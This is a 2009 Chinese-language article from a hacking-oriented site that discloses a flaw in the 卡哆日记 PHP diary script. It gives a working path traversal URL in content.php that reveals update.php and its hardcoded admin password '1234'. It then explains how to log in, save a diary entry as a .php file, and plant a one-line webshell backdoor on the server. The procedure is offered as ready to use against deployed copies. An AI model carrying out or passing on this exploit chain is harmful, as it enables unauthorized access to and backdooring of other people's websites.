黑基网 首页 学院 网络安全 查看内容

卡哆日记存在严重问题!

2009-2-4 10:28| 投稿: security

摘要: 作者: saiy (火狐某鱼) [ F S T ] http://www.wrsky.com 受影响版本:卡哆日记 所有版本(我就晓得一个版本,在中国站长站下载率好高哦)作者站点 :http://w...
作者: saiy (火狐某鱼) [ F S T ] http://www.wrsky.com 受影响版本:卡哆日记 所有版本(我就晓得一个版本,在中国站长站下载率好高哦)作者站点 :http://www.kaduo.com (在她站点上没找到这款日记本,虽然很好看,但是老了点,我是看代码无意翻找出来的,fox老大叫我增加阅读,偶就在站长站找代码读啊读啊读啊读,果然,阅读发现漏洞,早我为什么不去读啊。PS。。。。************************************************************其实日记在阅读的时候是用了框架并且限制住了鼠标右键,实际日记调用的页是content.php。在那个页的代码是这样的! <?php$fp=fopen($diaryfile,r);while(!feof($fp)){    $text=fgets($fp,1024);    $text=eregi_replace("<br>","",$text);    echo eregi_replace("\n","<br>",$text);}fclose($fp);?> 单纯的读$diaryfile这个文件!!$diaryfile=$y."-".$m."/".$d; $diaryfile=说白了就是年-月/日。懂吗?就是假设今天写了日记就是。$diaryfile=2005-1/88为2005-1下一个无后缀的文件,呼~这样都行?她强,谁叫她是女孩子呢?思想单纯了一点,提交网址:http://www.test.com/rj/content.php?y=2005&m=01&d=../update.php呼,我们看到了什么?此主题相关图片 <?php<br>/*......................................................*/<br>/*                                                      */<br>/*          本程序由姑嗒哆友情提供         */<br>/*          卡哆日记2002(共享版)v1.14       */<br>/*       http://www.kaduo.com [email protected]     */<br>/*                                                      */<br>/*......................................................*/<br>header("content-Type: text/html; charset=gb2312");<br>$upw="1234";<br>//请勿修改以下部分<br>if(file_exists("install.php")) unlink("install.php");<br>if($para=="menu"){<br>    menu();<br>    header("location:$jump");<br>  看到了吗?密码是1234!!那现在我们来干些什么呢?登陆http://www.test.com/rj/update.php输入密码,在日期那里最后一个日那里写成.php,今天是9号了啊?吓,就是9.php~~写后门程序吧~~~建议写一句话后门,因为会被转义的!!写完访问地址为http://www.test.com/rj/2005-1/9.php 520)this.width=520;" style="CURSOR: hand" onclick=javascript:window.open(this.src); src="/uploadfile/200902/20090204011751218.bmp" onload="javascript:if(this.width>520)this.width=520;" align=absMiddle border=0>此漏洞也没什么好说的,无非是既然读代码了,读出问题了,就写一下吧!
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部